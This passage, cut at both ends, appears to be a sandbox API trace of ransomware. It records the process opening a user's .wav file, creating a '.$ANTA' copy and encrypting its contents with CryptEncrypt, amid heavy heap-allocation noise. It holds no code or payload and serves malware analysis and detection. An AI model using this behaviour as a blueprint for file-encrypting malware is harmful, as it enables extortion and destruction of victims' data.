lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0117.820] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0117.821] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0117.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea268 [0117.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0117.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0117.821] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0117.821] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0117.821] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0117.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0117.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0117.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0117.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0117.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0117.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0117.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0117.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0117.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0117.822] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\TFaPhwZGXS0zM.wav" (normalized: "c:\\users\\fd1hvy\\music\\spiobph75b\\tfaphwzgxs0zm.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0117.822] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.822] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0117.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0117.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0117.822] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0117.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0117.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0117.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0117.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0117.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.823] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0117.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0117.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0117.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0117.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0117.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0117.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0117.823] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0117.823] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0117.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0117.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0117.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0117.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0117.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0117.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0117.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0117.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0117.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0117.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4590 [0117.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0117.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0117.824] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0117.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4590 | out: hHeap=0x1780000) returned 1 [0117.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0117.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0117.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0117.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0117.824] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0117.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0117.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a608 [0117.825] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\" (normalized: "c:\\users\\fd1hvy\\music\\spiobph75b")) returned 0x10 [0117.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0117.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0117.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0117.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0117.825] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\TFaPhwZGXS0zM.wav.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\spiobph75b\\tfaphwzgxs0zm.wav.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0117.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0117.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0117.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0117.825] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0117.826] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0117.826] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0117.826] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0e020 [0117.829] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0117.829] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x43ef, lpOverlapped=0x0) returned 1 [0117.831] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0117.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0117.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x43ef) returned 0x4516010 [0117.834] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0117.834] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0117.834] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0117.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0117.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0117.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0117.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0117.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0117.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0117.834] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0117.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0117.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0117.835] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.835] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0117.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0117.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0117.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0117.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796de8 [0117.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0117.835] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2720, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2720*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0117.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0117.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9bf0 [0117.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0117.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0117.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0117.835] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.835] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.836] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.836] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.836] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43ca9b8 [0117.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca9b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0117.836] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x43ef, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x43f0) returned 1 [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0117.836] CharLowerBuffW (in: lpsz="byte[17393]", cchLength=0xb | out: lpsz="byte[17393]") returned 0xb [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0117.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0117.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0117.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0117.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0117.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0117.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0117.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0117.837] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.837] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0117.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0117.837] RtlAllocateHeap 